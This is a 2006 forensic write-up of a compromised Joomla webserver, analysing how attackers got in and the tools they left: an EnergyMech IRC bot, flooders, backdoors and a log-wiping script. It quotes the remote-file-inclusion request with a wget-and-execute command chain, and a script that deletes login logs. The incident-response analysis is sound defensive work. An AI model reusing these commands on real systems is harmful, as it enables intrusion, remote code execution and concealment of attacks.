Text: mech28bot analysis Author: lockdown (www.lockeddown.net) Date: July 29, 2006 I was asked to investigate a misbehaving Linux webserver. The following explains how they got in and gives a breif analysis of the tools they left behind. It seemed the server had been compromised and I was told one application that was known to be out of date was Joomla. Searching the access-logs of the site running Joomla I see an entry from two days prior: 200.88.x.x - - [27/Jul/2006:20:54:03] "GET /administrator/components/com_peopleb ook/param.peoplebook.php?mosConfig_absolute_path=http://example.it/.mn/cmd.txt?& cmd=cd%20/tmp;rm%20-rf%20*;wget%20example.it/.mn/mech.tar;tar%20-xvf%20mech.tar; cd%20httpd;./start.sh;cd%20/tmp;rm%20-rf%20mech.tar;mv%20httpd%20.httpd HTTP/1.1 " 200 2248 They used a bug in Joomla to include a file from a 3rd party site which also appears to have been compromised. This site is in italy but I have changed the name to protect them. Here is what the above command did: cd /tmp; rm -rf *; wget example.it/.mn/mech.tar; tar -xvf mech.tar; cd httpd; ./start.sh; cd /tmp; rm -rf mech.tar; mv httpd .httpd The following files were found in /tmp/.httpd Filename MD5SUM clear.sh dc.txt d1f89d87f61920449467bec16171795a f3 919e40cce37adf9eb28efd5f5420376a Fl00d.seen ftp HBC.seen httpd f5b1420933dc0f210a2664e23a58c039 mech.help mech.levels mech.pid mech.session mech.set s 4078e8f7ce154dbba1eaeffc83f5f172 start.sh udp.pl 6c456619bac5b534f196cc9a678b4279 z 7e651f1334dbea3f7aba87f7bc03a8b8 We see that they executed start.sh so lets see what it contains: /#bin/bash PATH="." httpd echo " " Looks like the first line was mistyped and should have been #!/bin/bash, this causes the script to instead run in the current shell which could cause problems in some cases but not this time... They set the PATH to the current directory which is /tmp/.httpd. On the next line they run httpd. Since they set the path to . if httpd executes any programs without a full path it will look for the file in the current directory. The file httpd is Enerymech 2.8 which is a free open source irc bot. I don't have the time to determine if this has been modified but since it is open source it would be extremely easy for them to customize it. My hunch is when no arguments are given it reads mech.set to determine what configuration to use. Mech.set, mech.session, mech.pid, mech.level, mech.help and ftp all seem like standard files used by EnergyMech. These include telling it what username to use and what server to join. Fl00d.seen and HBC.seen look like channel logs. clear.sh contains the following: #/bin/bash rm -rf /var/log/wtmp touch /var/log/wtmp rm -rf /var/log/secure touch /var/log/secure echo "Last login & SSH connections logs cleared" Once again they mistyped the first line. Then the script tries to delete two log files and put an empty file back in place. They did not escalate privileges beyond that of the web user so if they tried to run this it would not work. dc.txt is a perl script with the following description: "Data Cha0s connect back backdoor" The first argument of this script is the host to connect back to and the second argument is optional but it is the port to connect to. If you don't specify a port it defaults to 80. It is a pretty straight forward backdoor that redirects all input,output, and errors to the server and runs /bin/sh giving the attacker a shell. f3 - After a very quick look at a dead list it appears to be a UDP flooder. I would have to spend more time on it to confirm that. s - After a very quick look at a dead list it appears to be another flooder. This one appears to use a raw socket. udp.pl is a small perl script that floods with UDP packets. It randomizes the size of the packet and the port it uses. z - After a very quick look at a dead list it appears to be a TCP based backdoor. Looks like it listens on port 4000 but this may be configurable. This file isn't as simple as the others but I don't have the time now to go over it.